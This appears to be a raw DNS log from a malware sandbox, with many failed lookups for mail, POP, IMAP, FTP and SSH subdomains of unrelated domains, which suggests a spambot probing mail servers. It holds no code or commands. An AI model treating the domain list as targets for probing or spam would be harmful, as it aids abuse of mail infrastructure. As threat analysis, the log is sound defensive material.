Dec 22, 2023 21:14:58.985744953 CET	1.1.1.1	192.168.2.4	0x4d6e	Name error (3)	mail.9a07f8a339ec2a3e.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.989516973 CET	1.1.1.1	192.168.2.4	0xd67f	Name error (3)	mail.earnmagabucks.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.990973949 CET	1.1.1.1	192.168.2.4	0xfff5	Name error (3)	mail.select-feeds.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.992252111 CET	1.1.1.1	192.168.2.4	0x2c7d	Name error (3)	mail.rio-perfume.orgua	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.993511915 CET	1.1.1.1	192.168.2.4	0xdd05	Name error (3)	mail.jesusanswwers.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.001852989 CET	1.1.1.1	192.168.2.4	0xc6e7	Name error (3)	ssh.91069b3d854a1035.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.010561943 CET	1.1.1.1	192.168.2.4	0x6443	Name error (3)	pop.daystarbookscharity.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.019387960 CET	1.1.1.1	192.168.2.4	0x996b	Name error (3)	mail.piiyuw.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.027784109 CET	1.1.1.1	192.168.2.4	0xa0af	Name error (3)	mail.mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.037009001 CET	1.1.1.1	192.168.2.4	0xd96	Name error (3)	mail.sodataol.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.038937092 CET	1.1.1.1	192.168.2.4	0xca9f	Name error (3)	mail.pkmanagment.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.045751095 CET	1.1.1.1	192.168.2.4	0x6ca8	Name error (3)	mail.nhclex.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.045979977 CET	1.1.1.1	192.168.2.4	0x7b79	Name error (3)	ftp.nhclex.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.051071882 CET	1.1.1.1	192.168.2.4	0x17	Name error (3)	ftp.gn.ais.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.051176071 CET	1.1.1.1	192.168.2.4	0xa0af	Name error (3)	mail.mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.056062937 CET	1.1.1.1	192.168.2.4	0xfaf2	Name error (3)	mail.djmeca.com.ca	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.056762934 CET	1.1.1.1	192.168.2.4	0x740c	Name error (3)	pop.piiyuw.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.058141947 CET	1.1.1.1	192.168.2.4	0x990a	Name error (3)	imap.buyhits.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.076941013 CET	1.1.1.1	192.168.2.4	0x174f	Name error (3)	pop.cominex.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.080241919 CET	1.1.1.1	192.168.2.4	0x126c	Name error (3)	mail.sitehalogen.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.084709883 CET	1.1.1.1	192.168.2.4	0x9c74	Name error (3)	mail.acaiforcemaxweightloss.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.098964930 CET	1.1.1.1	192.168.2.4	0xc541	Name error (3)	mail.cominex.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.100181103 CET	1.1.1.1	192.168.2.4	0x6ca8	Name error (3)	mail.nhclex.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.100409985 CET	1.1.1.1	192.168.2.4	0x495	Name error (3)	mail.rdhppx.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.100573063 CET	1.1.1.1	192.168.2.4	0xac14	Name error (3)	mail.154892628.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.100636959 CET	1.1.1.1	192.168.2.4	0x7b79	Name error (3)	ftp.nhclex.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.104196072 CET	1.1.1.1	192.168.2.4	0x425f	Name error (3)	mail.hoefakker.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.104274035 CET	1.1.1.1	192.168.2.4	0x425f	Name error (3)	mail.hoefakker.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.104866982 CET	1.1.1.1	192.168.2.4	0x74c3	Name error (3)	ssh.williamcroy.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.104978085 CET	1.1.1.1	192.168.2.4	0x74c3	Name error (3)	ssh.williamcroy.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.131808996 CET	1.1.1.1	192.168.2.4	0x35c7	Name error (3)	ftp.ambquinn.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.131910086 CET	1.1.1.1	192.168.2.4	0x35c7	Name error (3)	ftp.ambquinn.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.136688948 CET	1.1.1.1	192.168.2.4	0x7515	Name error (3)	relay.williamcroy.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.136729002 CET	1.1.1.1	192.168.2.4	0x7515	Name error (3)	relay.williamcroy.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.137460947 CET	1.1.1.1	192.168.2.4	0x6b84	Name error (3)	ftp.williamcroy.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.137553930 CET	1.1.1.1	192.168.2.4	0x6b84	Name error (3)	ftp.williamcroy.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.142916918 CET	1.1.1.1	192.168.2.4	0x990a	Name error (3)	imap.buyhits.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.142950058 CET	1.1.1.1	192.168.2.4	0x996b	Name error (3)	mail.piiyuw.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.143209934 CET	1.1.1.1	192.168.2.4	0xd96	Name error (3)	mail.sodataol.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.143356085 CET	1.1.1.1	192.168.2.4	0xca9f	Name error (3)	mail.pkmanagment.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.143665075 CET	1.1.1.1	192.168.2.4	0x740c	Name error (3)	pop.piiyuw.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.147368908 CET	1.1.1.1	192.168.2.4	0x85c4	Name error (3)	pop.djmeca.com.ca	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.174485922 CET	1.1.1.1	192.168.2.4	0x7ccd	Name error (3)	ftp.mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.174619913 CET	1.1.1.1	192.168.2.4	0x7ccd	Name error (3)	ftp.mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.188782930 CET	1.1.1.1	192.168.2.4	0x7330	Name error (3)	mail.bopclip.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.188910961 CET	1.1.1.1	192.168.2.4	0x7330	Name error (3)	mail.bopclip.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.231621027 CET	1.1.1.1	192.168.2.4	0x9270	Name error (3)	ftp.excursionesmadryn.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.231631994 CET	1.1.1.1	192.168.2.4	0x9270	Name error (3)	ftp.excursionesmadryn.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.240947962 CET	1.1.1.1	192.168.2.4	0x19a4	Name error (3)	mail.hodginssmithconsulting.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.257574081 CET	1.1.1.1	192.168.2.4	0xacca	Name error (3)	mail.rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.258125067 CET	1.1.1.1	192.168.2.4	0xacca	Name error (3)	mail.rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.261307001 CET	1.1.1.1	192.168.2.4	0x13ec	Name error (3)	ftp.rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.261317968 CET	1.1.1.1	192.168.2.4	0x13ec	Name error (3)	ftp.rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.363630056 CET	1.1.1.1	192.168.2.4	0x6c1a	Name error (3)	mail.excursionesmadryn.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.363720894 CET	1.1.1.1	192.168.2.4	0x6c1a	Name error (3)	mail.excursionesmadryn.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.363756895 CET	1.1.1.1	192.168.2.4	0x6c1a	Name error (3)	mail.excursionesmadryn.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.485249996 CET	1.1.1.1	192.168.2.4	0xe5b6	Name error (3)	pop.9a07f8a339ec2a3e.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.486412048 CET	1.1.1.1	192.168.2.4	0x2886	Name error (3)	pop.chemcaregroup.compg	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.517215014 CET	1.1.1.1	192.168.2.4	0xbc0d	Name error (3)	mail.aurora-resorts.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.519145966 CET	1.1.1.1	192.168.2.4	0xd0e1	Name error (3)	pop.aurora-resorts.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.540565014 CET	1.1.1.1	192.168.2.4	0x499d	Name error (3)	mail.dm.famm.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.545100927 CET	1.1.1.1	192.168.2.4	0xcd4b	Name error (3)	mail.bilfinger.comqa	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.550447941 CET	1.1.1.1	192.168.2.4	0xea1	Name error (3)	ftp.cominex.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.551876068 CET	1.1.1.1	192.168.2.4	0x261f	Name error (3)	ftp.studnets.ocps.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.552442074 CET	1.1.1.1	192.168.2.4	0x9061	Name error (3)	ftp.firsteuropaglobal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.554497957 CET	1.1.1.1	192.168.2.4	0xd315	Name error (3)	imap.e-manage.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.555219889 CET	1.1.1.1	192.168.2.4	0x9d97	Name error (3)	pop.dinfos.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.577058077 CET	1.1.1.1	192.168.2.4	0x7f9d	Name error (3)	mail.firsteuropaglobal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.585923910 CET	1.1.1.1	192.168.2.4	0xcd0b	Name error (3)	ftp.aurora-resorts.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.609045029 CET	1.1.1.1	192.168.2.4	0xed6d	Name error (3)	pop.select-feeds.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.609632015 CET	1.1.1.1	192.168.2.4	0x9e8f	Name error (3)	ssh.gn.ais.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.616435051 CET	1.1.1.1	192.168.2.4	0x8757	Name error (3)	pop3.integral-tours.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.617990017 CET	1.1.1.1	192.168.2.4	0x1683	Name error (3)	pop.djaskdas.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.619513988 CET	1.1.1.1	192.168.2.4	0xeed0	Name error (3)	mailgate.sitehalogen.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.629401922 CET	1.1.1.1	192.168.2.4	0xa553	Name error (3)	pop.dm.famm.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.638736010 CET	1.1.1.1	192.168.2.4	0xf93c	Name error (3)	mail.dinfos.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.649405956 CET	1.1.1.1	192.168.2.4	0x510f	Name error (3)	pop.enhancementsmast.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.672041893 CET	1.1.1.1	192.168.2.4	0x9d97	Name error (3)	pop.dinfos.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.673131943 CET	1.1.1.1	192.168.2.4	0x499d	Name error (3)	mail.dm.famm.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.705802917 CET	1.1.1.1	192.168.2.4	0xcfa0	Name error (3)	pop.263host.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.733127117 CET	1.1.1.1	192.168.2.4	0x8757	Name error (3)	pop3.integral-tours.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.733221054 CET	1.1.1.1	192.168.2.4	0x1683	Name error (3)	pop.djaskdas.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.733550072 CET	1.1.1.1	192.168.2.4	0xed6d	Name error (3)	pop.select-feeds.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.738889933 CET	1.1.1.1	192.168.2.4	0x1025	Name error (3)	mail.263host.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.749789000 CET	1.1.1.1	192.168.2.4	0x3fa4	No error (0)	mx2-us1.ppe-hosted.com		148.163.129.51	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.749789000 CET	1.1.1.1	192.168.2.4	0x3fa4	No error (0)	mx2-us1.ppe-hosted.com		67.231.154.163	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.764834881 CET	1.1.1.1	192.168.2.4	0x535f	Name error (3)	pop.sitehalogen.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.771229982 CET	1.1.1.1	192.168.2.4	0xa402	Name error (3)	pop.saskgmail.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.915718079 CET	1.1.1.1	192.168.2.4	0xea12	Name error (3)	souriahost.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.976254940 CET	1.1.1.1	192.168.2.4	0x9e35	Name error (3)	263host.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.983458042 CET	1.1.1.1	192.168.2.4	0x3d82	Name error (3)	dm.famm.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.985079050 CET	1.1.1.1	192.168.2.4	0xedc5	Name error (3)	acaiforcemaxweightloss.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.985882044 CET	1.1.1.1	192.168.2.4	0xe14a	Name error (3)	rio-perfume.orgua	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.990945101 CET	1.1.1.1	192.168.2.4	0xe92c	Name error (3)	rdhppx.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.000540972 CET	1.1.1.1	192.168.2.4	0xf3b2	Name error (3)	bilfinger.comqa	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.001094103 CET	1.1.1.1	192.168.2.4	0x7e12	Name error (3)	studnets.ocps.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.001415968 CET	1.1.1.1	192.168.2.4	0xc33d	Name error (3)	chemcaregroup.compg	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.001888037 CET	1.1.1.1	192.168.2.4	0xc538	Name error (3)	djmeca.com.ca	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.003017902 CET	1.1.1.1	192.168.2.4	0xbd8	Name error (3)	hyiquu.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.003736019 CET	1.1.1.1	192.168.2.4	0xfc7	Name error (3)	djaskdas.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.005228043 CET	1.1.1.1	192.168.2.4	0x9bfa	Name error (3)	aurora-resorts.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.007189035 CET	1.1.1.1	192.168.2.4	0xb874	Name error (3)	ssh.saskgmail.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.017297029 CET	1.1.1.1	192.168.2.4	0xe8e2	Name error (3)	bopclip.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.017317057 CET	1.1.1.1	192.168.2.4	0x69a1	Name error (3)	91069b3d854a1035.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.019367933 CET	1.1.1.1	192.168.2.4	0xcd63	Name error (3)	mercor.compl	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.020231009 CET	1.1.1.1	192.168.2.4	0x1d1f	Name error (3)	enhancementsmast.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.020375013 CET	1.1.1.1	192.168.2.4	0x3d23	Name error (3)	mywitce.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.022727966 CET	1.1.1.1	192.168.2.4	0x4158	Name error (3)	taylorbryant.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.031480074 CET	1.1.1.1	192.168.2.4	0x303f	Name error (3)	piiyuw.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.031624079 CET	1.1.1.1	192.168.2.4	0xea12	Name error (3)	souriahost.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.033958912 CET	1.1.1.1	192.168.2.4	0xa771	Name error (3)	select-feeds.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.033987999 CET	1.1.1.1	192.168.2.4	0x21c7	Name error (3)	nsorekek.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.038153887 CET	1.1.1.1	192.168.2.4	0xf0b6	Name error (3)	ssh.9a07f8a339ec2a3e.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.038741112 CET	1.1.1.1	192.168.2.4	0xc76a	Name error (3)	vesond.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.050103903 CET	1.1.1.1	192.168.2.4	0xb38f	Name error (3)	pop.arbsdecq.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.054435968 CET	1.1.1.1	192.168.2.4	0xcee7	Name error (3)	jesusanswwers.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.060866117 CET	1.1.1.1	192.168.2.4	0xb818	Name error (3)	ssh.bilfinger.comqa	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.065541983 CET	1.1.1.1	192.168.2.4	0x6768	Name error (3)	hoefakker.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.068599939 CET	1.1.1.1	192.168.2.4	0x3a7c	Name error (3)	mail.asdfhjlasdfhjlk1.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.068943024 CET	1.1.1.1	192.168.2.4	0x40b0	Name error (3)	pop.firsteuropaglobal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.070647001 CET	1.1.1.1	192.168.2.4	0x88d4	Name error (3)	pop3.buyhits.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.071618080 CET	1.1.1.1	192.168.2.4	0xdc20	Name error (3)	hermanassociatesnewyork.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.077408075 CET	1.1.1.1	192.168.2.4	0x9022	Name error (3)	mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.079088926 CET	1.1.1.1	192.168.2.4	0x2ec1	Name error (3)	ssh.joserafael.com.ve	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.080832958 CET	1.1.1.1	192.168.2.4	0x5a17	Name error (3)	arbsdecq.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.087480068 CET	1.1.1.1	192.168.2.4	0xf108	Name error (3)	pop3.harrell-associates.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.103343010 CET	1.1.1.1	192.168.2.4	0x8448	Name error (3)	mail.joserafael.com.ve	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.108851910 CET	1.1.1.1	192.168.2.4	0xfcff	Name error (3)	ssh.asdfhjlasdfhjlk1.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.113487005 CET	1.1.1.1	192.168.2.4	0x79cc	Name error (3)	pop.taylorbryant.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.113586903 CET	1.1.1.1	192.168.2.4	0x4b60	Name error (3)	pop.mywitce.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.113935947 CET	1.1.1.1	192.168.2.4	0x8403	Name error (3)	pop.studnets.ocps.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.142187119 CET	1.1.1.1	192.168.2.4	0xcd6	Name error (3)	pop.dresslermd.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.171334982 CET	1.1.1.1	192.168.2.4	0xcd63	Name error (3)	mercor.compl	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.171355009 CET	1.1.1.1	192.168.2.4	0x3d23	Name error (3)	mywitce.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.171499014 CET	1.1.1.1	192.168.2.4	0x1d1f	Name error (3)	enhancementsmast.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.171574116 CET	1.1.1.1	192.168.2.4	0x4158	Name error (3)	taylorbryant.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.171830893 CET	1.1.1.1	192.168.2.4	0x69a1	Name error (3)	91069b3d854a1035.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.171863079 CET	1.1.1.1	192.168.2.4	0x9022	Name error (3)	mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.171972036 CET	1.1.1.1	192.168.2.4	0xa771	Name error (3)	select-feeds.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.172138929 CET	1.1.1.1	192.168.2.4	0xc76a	Name error (3)	vesond.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.172179937 CET	1.1.1.1	192.168.2.4	0xb38f	Name error (3)	pop.arbsdecq.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.172574997 CET	1.1.1.1	192.168.2.4	0x21c7	Name error (3)	nsorekek.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.172693968 CET	1.1.1.1	192.168.2.4	0xdc20	Name error (3)	hermanassociatesnewyork.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.172969103 CET	1.1.1.1	192.168.2.4	0xcee7	Name error (3)	jesusanswwers.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.188961029 CET	1.1.1.1	192.168.2.4	0x110c	Name error (3)	pop.gpa.orgau	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.238699913 CET	1.1.1.1	192.168.2.4	0xf108	Name error (3)	pop3.harrell-associates.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.239751101 CET	1.1.1.1	192.168.2.4	0xfcff	Name error (3)	ssh.asdfhjlasdfhjlk1.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.240384102 CET	1.1.1.1	192.168.2.4	0x5a17	Name error (3)	arbsdecq.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.241748095 CET	1.1.1.1	192.168.2.4	0xa773	Name error (3)	pop.mercor.compl	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.245138884 CET	1.1.1.1	192.168.2.4	0x1198	Name error (3)	ssh.ambquinn.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.245212078 CET	1.1.1.1	192.168.2.4	0x1198	Name error (3)	ssh.ambquinn.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.257262945 CET	1.1.1.1	192.168.2.4	0xdd04	Name error (3)	pop.earnmagabucks.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.258280993 CET	1.1.1.1	192.168.2.4	0xa68c	Name error (3)	pop3.daystarbookscharity.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.287430048 CET	1.1.1.1	192.168.2.4	0x434b	Name error (3)	pop.154892628.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.289978027 CET	1.1.1.1	192.168.2.4	0xb23b	Name error (3)	pop.souriahost.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.318851948 CET	1.1.1.1	192.168.2.4	0x9d64	Name error (3)	mail.ambquinn.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.318911076 CET	1.1.1.1	192.168.2.4	0x9d64	Name error (3)	mail.ambquinn.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.321191072 CET	1.1.1.1	192.168.2.4	0x2376	Name error (3)	pop.vesond.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.342540979 CET	1.1.1.1	192.168.2.4	0x2231	Name error (3)	pop.rdhppx.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.348299980 CET	1.1.1.1	192.168.2.4	0x592	Name error (3)	pop.pkmanagment.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.373500109 CET	1.1.1.1	192.168.2.4	0x74bb	Name error (3)	pop.sodataol.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.402640104 CET	1.1.1.1	192.168.2.4	0x238	Name error (3)	pop.nhclex.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.435970068 CET	1.1.1.1	192.168.2.4	0x2376	Name error (3)	pop.vesond.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.440201044 CET	1.1.1.1	192.168.2.4	0xe305	No error (0)	smtp.secureserver.net		68.178.213.203	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.440201044 CET	1.1.1.1	192.168.2.4	0xe305	No error (0)	smtp.secureserver.net		216.69.141.81	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.440201044 CET	1.1.1.1	192.168.2.4	0xe305	No error (0)	smtp.secureserver.net		68.178.213.37	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.461925983 CET	1.1.1.1	192.168.2.4	0x2231	Name error (3)	pop.rdhppx.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.468110085 CET	1.1.1.1	192.168.2.4	0x9045	Name error (3)	pop.srlbonfon9.com.hk	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.498025894 CET	1.1.1.1	192.168.2.4	0xabf4	Name error (3)	pop.mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.518649101 CET	1.1.1.1	192.168.2.4	0xf35e	Name error (3)	caribbean360-com.p20.spamhero.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.531585932 CET	1.1.1.1	192.168.2.4	0xabf4	Name error (3)	pop.mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.531889915 CET	1.1.1.1	192.168.2.4	0x238	Name error (3)	pop.nhclex.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.586934090 CET	1.1.1.1	192.168.2.4	0x4942	Name error (3)	rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.587033033 CET	1.1.1.1	192.168.2.4	0x4942	Name error (3)	rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
